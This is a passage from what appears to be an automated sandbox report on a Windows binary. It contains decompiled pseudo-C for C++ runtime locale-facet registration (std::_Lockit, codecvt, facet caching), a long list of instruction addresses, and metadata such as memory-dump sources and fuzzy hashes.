                                                                                                																								_t772 = _t794;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t771 = _v16;
                                                                                                																						_v16 = _t771;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t771);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
                                                                                                																						 *0xfd0b04 = _t771;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t771 = _t793;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t770 = _v16;
                                                                                                																			_v16 = _t770;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t770);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
                                                                                                																			 *0xfd0af0 = _t770;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t770 = _t792;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t769 = _v16;
                                                                                                																_v16 = _t769;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t769);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
                                                                                                																 *0xfd0ad0 = _t769;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t769 = _t791;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t768 = _v16;
                                                                                                													_v16 = _t768;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t768);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
                                                                                                													 *0xfd0b00 = _t768;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t768 = _t790;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t767 = _v16;
                                                                                                										_v16 = _t767;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t767);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
                                                                                                										 *0xfd0aec = _t767;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t767 = _t789;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t766 = _v16;
                                                                                                							_v16 = _t766;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t766);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
                                                                                                							 *0xfd0b20 = _t766;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t766 = _t788;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}





















































                                                                                                0x00f86e46
                                                                                                0x00f86e46
                                                                                                0x00f86e4d
                                                                                                0x00f86e57
                                                                                                0x00f86e5c
                                                                                                0x00f86e67
                                                                                                0x00f86e6b
                                                                                                0x00f86e77
                                                                                                0x00f86e7c
                                                                                                0x00f86e80
                                                                                                0x00f86ec5
                                                                                                0x00f86ec8
                                                                                                0x00f86ed4
                                                                                                0x00f86e82
                                                                                                0x00f86e84
                                                                                                0x00f86e8a
                                                                                                0x00f86e90
                                                                                                0x00f86e98
                                                                                                0x00f86e9b
                                                                                                0x00f86ed5
                                                                                                0x00f86eda
                                                                                                0x00f86edb
                                                                                                0x00f86ee2
                                                                                                0x00f86eec
                                                                                                0x00f86ef1
                                                                                                0x00f86efc
                                                                                                0x00f86f00
                                                                                                0x00f86f11
                                                                                                0x00f86f13
                                                                                                0x00f86f15
                                                                                                0x00f86f5a
                                                                                                0x00f86f5d
                                                                                                0x00f86f69
                                                                                                0x00f86f17
                                                                                                0x00f86f17
                                                                                                0x00f86f19
                                                                                                0x00f86f1f
                                                                                                0x00f86f25
                                                                                                0x00f86f2d
                                                                                                0x00f86f30
                                                                                                0x00f86f6a
                                                                                                0x00f86f6f
                                                                                                0x00f86f70
                                                                                                0x00f86f77
                                                                                                0x00f86f81
                                                                                                0x00f86f86
                                                                                                0x00f86f91
                                                                                                0x00f86f95
                                                                                                0x00f86fa6
                                                                                                0x00f86fa8
                                                                                                0x00f86faa
                                                                                                0x00f86fef
                                                                                                0x00f86ff2
                                                                                                0x00f86ffe
                                                                                                0x00f86fac
                                                                                                0x00f86fac
                                                                                                0x00f86fae
                                                                                                0x00f86fb4
                                                                                                0x00f86fba
                                                                                                0x00f86fc2
                                                                                                0x00f86fc5
                                                                                                0x00f86fff
                                                                                                0x00f87004
                                                                                                0x00f87005
                                                                                                0x00f8700c
                                                                                                0x00f87016
                                                                                                0x00f8701b
                                                                                                0x00f87026
                                                                                                0x00f8702a
                                                                                                0x00f8703b
                                                                                                0x00f8703d
                                                                                                0x00f8703f
                                                                                                0x00f87084
                                                                                                0x00f87087
                                                                                                0x00f87093
                                                                                                0x00f87041
                                                                                                0x00f87041
                                                                                                0x00f87043
                                                                                                0x00f87049
                                                                                                0x00f8704f
                                                                                                0x00f87057
                                                                                                0x00f8705a
                                                                                                0x00f87094
                                                                                                0x00f87099
                                                                                                0x00f8709a
                                                                                                0x00f870a1
                                                                                                0x00f870ab
                                                                                                0x00f870b0
                                                                                                0x00f870bb
                                                                                                0x00f870bf
                                                                                                0x00f870d0
                                                                                                0x00f870d2
                                                                                                0x00f870d4
                                                                                                0x00f87119
                                                                                                0x00f8711c
                                                                                                0x00f87128
                                                                                                0x00f870d6
                                                                                                0x00f870d6
                                                                                                0x00f870d8
                                                                                                0x00f870de
                                                                                                0x00f870e4
                                                                                                0x00f870ec
                                                                                                0x00f870ef
                                                                                                0x00f87129
                                                                                                0x00f8712e
                                                                                                0x00f8712f
                                                                                                0x00f87136
                                                                                                0x00f87140
                                                                                                0x00f87145
                                                                                                0x00f87150
                                                                                                0x00f87154
                                                                                                0x00f87165
                                                                                                0x00f87167
                                                                                                0x00f87169
                                                                                                0x00f871ae
                                                                                                0x00f871b1
                                                                                                0x00f871bd
                                                                                                0x00f8716b
                                                                                                0x00f8716b
                                                                                                0x00f8716d
                                                                                                0x00f87173
                                                                                                0x00f87179
                                                                                                0x00f87181
                                                                                                0x00f87184
                                                                                                0x00f871be
                                                                                                0x00f871c3
                                                                                                0x00f871c4
                                                                                                0x00f871cb
                                                                                                0x00f871d5
                                                                                                0x00f871da
                                                                                                0x00f871e5
                                                                                                0x00f871e9
                                                                                                0x00f871fa
                                                                                                0x00f871fc
                                                                                                0x00f871fe
                                                                                                0x00f87243
                                                                                                0x00f87246
                                                                                                0x00f87252
                                                                                                0x00f87200
                                                                                                0x00f87200
                                                                                                0x00f87202
                                                                                                0x00f87208
                                                                                                0x00f8720e
                                                                                                0x00f87216
                                                                                                0x00f87219
                                                                                                0x00f87253
                                                                                                0x00f87258
                                                                                                0x00f87259
                                                                                                0x00f87260
                                                                                                0x00f8726a
                                                                                                0x00f8726f
                                                                                                0x00f8727a
                                                                                                0x00f8727e
                                                                                                0x00f8728f
                                                                                                0x00f87291
                                                                                                0x00f87293
                                                                                                0x00f872d8
                                                                                                0x00f872db
                                                                                                0x00f872e7
                                                                                                0x00f87295
                                                                                                0x00f87295
                                                                                                0x00f87297
                                                                                                0x00f8729d
                                                                                                0x00f872a3
                                                                                                0x00f872ab
                                                                                                0x00f872ae
                                                                                                0x00f872e8
                                                                                                0x00f872ed
                                                                                                0x00f872ee
                                                                                                0x00f872f5
                                                                                                0x00f872ff
                                                                                                0x00f87304
                                                                                                0x00f8730f
                                                                                                0x00f87313
                                                                                                0x00f87324
                                                                                                0x00f87326
                                                                                                0x00f87328
                                                                                                0x00f8736d
                                                                                                0x00f87370
                                                                                                0x00f8737c
                                                                                                0x00f8732a
                                                                                                0x00f8732a
                                                                                                0x00f8732c
                                                                                                0x00f87332
                                                                                                0x00f87338
                                                                                                0x00f87340
                                                                                                0x00f87343
                                                                                                0x00f8737d
                                                                                                0x00f87382
                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b9
                                                                                                0x00f873bb
                                                                                                0x00f873bd
                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202
                                                                                                0x00f87186
                                                                                                0x00f87186
                                                                                                0x00f87189
                                                                                                0x00f8718d
                                                                                                0x00f87191
                                                                                                0x00f8719e
                                                                                                0x00f871a6
                                                                                                0x00f871a8
                                                                                                0x00000000
                                                                                                0x00f871a8
                                                                                                0x00f8716f
                                                                                                0x00f8716f
                                                                                                0x00000000
                                                                                                0x00f8716f
                                                                                                0x00f8716d
                                                                                                0x00f870f1
                                                                                                0x00f870f1
                                                                                                0x00f870f4
                                                                                                0x00f870f8
                                                                                                0x00f870fc
                                                                                                0x00f87109
                                                                                                0x00f87111
                                                                                                0x00f87113
                                                                                                0x00000000
                                                                                                0x00f87113
                                                                                                0x00f870da
                                                                                                0x00f870da
                                                                                                0x00000000
                                                                                                0x00f870da
                                                                                                0x00f870d8
                                                                                                0x00f8705c
                                                                                                0x00f8705c
                                                                                                0x00f8705f
                                                                                                0x00f87063
                                                                                                0x00f87067
                                                                                                0x00f87074
                                                                                                0x00f8707c
                                                                                                0x00f8707e
                                                                                                0x00000000
                                                                                                0x00f8707e
                                                                                                0x00f87045
                                                                                                0x00f87045
                                                                                                0x00000000
                                                                                                0x00f87045
                                                                                                0x00f87043
                                                                                                0x00f86fc7
                                                                                                0x00f86fc7
                                                                                                0x00f86fca
                                                                                                0x00f86fce
                                                                                                0x00f86fd2
                                                                                                0x00f86fdf
                                                                                                0x00f86fe7
                                                                                                0x00f86fe9
                                                                                                0x00000000
                                                                                                0x00f86fe9
                                                                                                0x00f86fb0
                                                                                                0x00f86fb0
                                                                                                0x00000000
                                                                                                0x00f86fb0
                                                                                                0x00f86fae
                                                                                                0x00f86f32
                                                                                                0x00f86f32
                                                                                                0x00f86f35
                                                                                                0x00f86f39
                                                                                                0x00f86f3d
                                                                                                0x00f86f4a
                                                                                                0x00f86f52
                                                                                                0x00f86f54
                                                                                                0x00000000
                                                                                                0x00f86f54
                                                                                                0x00f86f1b
                                                                                                0x00f86f1b
                                                                                                0x00000000
                                                                                                0x00f86f1b
                                                                                                0x00f86f19
                                                                                                0x00f86e9d
                                                                                                0x00f86e9d
                                                                                                0x00f86ea0
                                                                                                0x00f86ea4
                                                                                                0x00f86ea8
                                                                                                0x00f86eb5
                                                                                                0x00f86ebd
                                                                                                0x00f86ebf
                                                                                                0x00000000
                                                                                                0x00f86ebf
                                                                                                0x00f86e86
                                                                                                0x00f86e86
                                                                                                0x00000000
                                                                                                0x00f86e86
                                                                                                0x00f86e84

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F86E4D
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F86E57
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • codecvt.LIBCPMT ref: 00F86E91
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F86EA8
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F86EC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                • String ID:
                                                                                                • API String ID: 712880209-0
                                                                                                • Opcode ID: 915c4138127498bd3ef3955ea8370541ce16a53e7bf325012f2153201966c30a
                                                                                                • Instruction ID: d6b34d957c3e180ed6bd600583bd16c9bdee8e061cf75460c88b0758ea5ce010
                                                                                                • Opcode Fuzzy Hash: 915c4138127498bd3ef3955ea8370541ce16a53e7bf325012f2153201966c30a
                                                                                                • Instruction Fuzzy Hash: 4F01C4399001299BCB05FB64CC157FE77B1AF84760F54410AF401A7392DF389E02BB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F86F70(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v72;
                                                                                                				signed int _t237;
                                                                                                				void* _t440;
                                                                                                				short* _t634;
                                                                                                				void* _t692;
                                                                                                				signed int _t695;
                                                                                                				signed int _t696;
                                                                                                				signed int _t697;
                                                                                                				signed int _t698;
                                                                                                				signed int _t699;
                                                                                                				signed int _t700;
                                                                                                				signed int _t701;
                                                                                                				signed int _t702;
                                                                                                				signed int _t703;
                                                                                                				signed int _t704;
                                                                                                				signed int _t705;
                                                                                                				signed int _t706;
                                                                                                				signed int _t707;
                                                                                                				signed int _t708;
                                                                                                				signed int _t709;
                                                                                                				signed int _t710;
                                                                                                				signed int _t711;
                                                                                                				signed int _t712;
                                                                                                				signed int _t714;
                                                                                                				signed int _t715;
                                                                                                				signed int _t716;
                                                                                                				signed int _t717;
                                                                                                				signed int _t718;
                                                                                                				signed int _t719;
                                                                                                				signed int _t720;
                                                                                                				signed int _t721;
                                                                                                				signed int _t722;
                                                                                                				signed int _t723;
                                                                                                				signed int _t724;
                                                                                                				signed int _t725;
                                                                                                				signed int _t726;
                                                                                                				signed int _t727;
                                                                                                				signed int _t728;
                                                                                                				signed int _t729;
                                                                                                				signed int _t730;
                                                                                                				signed int _t731;
                                                                                                				signed int _t732;
                                                                                                				short* _t733;
                                                                                                
                                                                                                				_t692 = __edx;
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t714 =  *0xfd0b00; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t714;
                                                                                                				_t237 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t694 = _t237;
                                                                                                				if(_t237 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t694);
                                                                                                				} else {
                                                                                                					if(_t714 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88438(_t692, _t694, _t714, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t694, _t714);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t715 =  *0xfd0ad0; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t715;
                                                                                                							_t695 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t695;
                                                                                                							if(_t695 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t695);
                                                                                                							} else {
                                                                                                								__eflags = _t715;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F884DA(_t692, _t695, _t715, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t695, _t715);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t716 =  *0xfd0af0; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t716;
                                                                                                										_t696 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t696;
                                                                                                										if(_t696 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t696);
                                                                                                										} else {
                                                                                                											__eflags = _t716;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F8857C(_t696, _t716, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
